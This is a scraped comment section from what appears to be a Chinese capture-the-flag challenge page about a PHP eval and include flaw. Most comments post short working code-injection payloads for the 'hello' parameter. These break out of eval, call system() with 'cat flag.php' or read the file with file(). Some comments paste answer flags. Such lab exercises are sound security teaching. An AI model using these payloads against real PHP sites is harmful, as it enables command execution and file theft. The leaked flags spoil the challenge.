评分(12)
解题动态
Hogan 攻破了该题 3小时前
sorry123 攻破了该题 5小时前
xiaolili 攻破了该题 6小时前
ljjbit 攻破了该题 10小时前
墨尘 攻破了该题 10小时前
booku 攻破了该题 11小时前
15306829633 攻破了该题 12小时前
CHT 攻破了该题 12小时前
河马 攻破了该题 13小时前
Mr.Cyber 攻破了该题 15小时前
聪仔草莓51 攻破了该题 16小时前
pleonexia123 攻破了该题 16小时前
wsx68696 攻破了该题 1天前
lipingctf 攻破了该题 1天前
H1lla1n 攻破了该题 1天前
liyimanfan 攻破了该题 1天前
Yun1217 攻破了该题 2天前
你倒过来读看看呢 攻破了该题 2天前
jvfnvd.vl 攻破了该题 2天前
评论
MuYangfool 3年前
举报
?hello=);highlight_file(%27flag.php%27);var_dump(
我爱你制杖 3年前
举报
解题思路: 1.利用eval()函数可将函数中的参数当作php代码执行,故可通过命令执行漏洞system()函数去查看当前目录中的内容(如本题:?hello=system(".")来查看,获得flag.php文件名) 2.利用file()函数读取flag.php文件内容(如本题:?hello=file("flag.php"),需注意此处存在var_dun
五无心惘然 3年前
举报
flag{78096610f3a54eda62265ae8d6835aab}
18244914085 3年前
举报
直接使用system查看包含的文件flag.php, eval执行变量$a ?hello=system('cat flag.php | base64')
Lsec 3年前
举报
1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))
你呀你ii 3年前
举报
?hello=eval(system('cat flag.php | base64'))
baianquanzu 3年前
举报
?hello=system('sort flag.php')
xlxlxl 3年前
举报
?hello=system('cat flag.php')
凉情梦回 3年前
举报
?hello=system('cat flag.php')
liu666 3年前
举报
flag{930e51a7a500775093c95aae8b67e404}
userdong 3年前
举报
?hello=system('cat flag.php')
riacky 3年前
举报
?hello=system('cat flag*')
hhthht 3年前
举报
flag{cea9de710e2926a7c49f12318caf3912}
ryan777 3年前
举报
根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')
AmazingForself 3年前
举报
看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539
ryl123569 3年前
举报
?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}